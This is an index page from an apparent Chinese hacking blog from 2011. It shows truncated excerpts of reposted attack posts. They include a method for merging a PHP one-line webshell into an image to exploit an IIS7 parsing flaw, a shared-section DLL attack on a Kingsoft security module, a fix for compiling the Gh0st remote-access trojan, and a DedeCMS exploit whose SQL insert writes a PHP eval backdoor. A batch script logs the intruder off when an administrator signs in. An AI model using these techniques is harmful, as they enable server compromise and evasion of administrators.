通杀IIS7.0畸形解析0day漏洞和Nginx那个0day差不多

2011-8-28 王健宇 转载

先合并一张PHP一句话图片马,合并方法:
①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif
②、用edjpgcom,进行图片和一句话木马的合并,一句话代码为“ 


图片随便找一张.
【顺带着说一下edjpgcom的使用方法:打开edjpgcom.exe所在文件夹,然后把你所要修改的图片拖动到edjpgc...

阅读全文>>

标签: IIS7.0畸形解析0day

评论(0) 浏览(3426)

共享段攻击 Shared Sections' Attacking

2011-8-22 王健宇 转载

一般常见的某些软件喜欢使用HHOOK类钩子注入DLL,由于他们多数都抄了流行的那个典范代码中一些东西,比如共享段,对于共享段而言,丫是全宇宙可读可写啊(属性是0xD0000040)
于是一种新型的针对某些软件的某些部件的攻击方式诞生鸟~
这里以金山KSAFE的ksfmon.dll举个例子
IDA中打开的样子

我震惊的发现HHOOK~~
想到什么了?
对如果我们直接对丫进行XX
测试代码:
...

阅读全文>>

标签: Shared Attacking

评论(0) 浏览(3861)

\sdk\include\wspiapi.h(47) : error C2265: '<Unknown>' : reference to a zero-sized array is illegal 解决方案

2011-8-17 王健宇 转载

今天,编译了Gh0st源码发现个错误,原来是我VC6有问题哟,呵呵

百度、csdn都去了,终于解决了!不敢独享,特来分享..

编写IP多播程序时,要用到ip_mrep结构,在编译时会遇到如下的错误:

 \sdk\include\wspiapi.h(47) : error C2265: '<Unknown>' : reference to a zero-sized arra...

阅读全文>>

标签: wspiapi.h(47)reference to a zero-sized array is illegal 解决方案

评论(0) 浏览(4487)

DEDECMS拿SHELL EXP

2011-8-14 王健宇 转载

网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell
前题条件,必须准备好自己的dede数据库,然后插入数据:

insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'<?phpeval...

阅读全文>>

标签: dedecms getshell

评论(0) 浏览(3144)

C段时常用的批处理

2011-7-20 王健宇 转载

检测管理员上线就注销自已:

@echo off
:check
choice /C YN /T 10 /D Y
quser find "#16"   && del xx.bat logoff
goto check

每次运行这个 bat 的时候先quser 一下,看当前的会话id 是多少,然后加1 每连接一次就会加1。以上适应使用管理员帐号时。

下面适应使用...

阅读全文>>

标签: C段常用批处理

评论(0) 浏览(4449)

Powered by emlog sitemap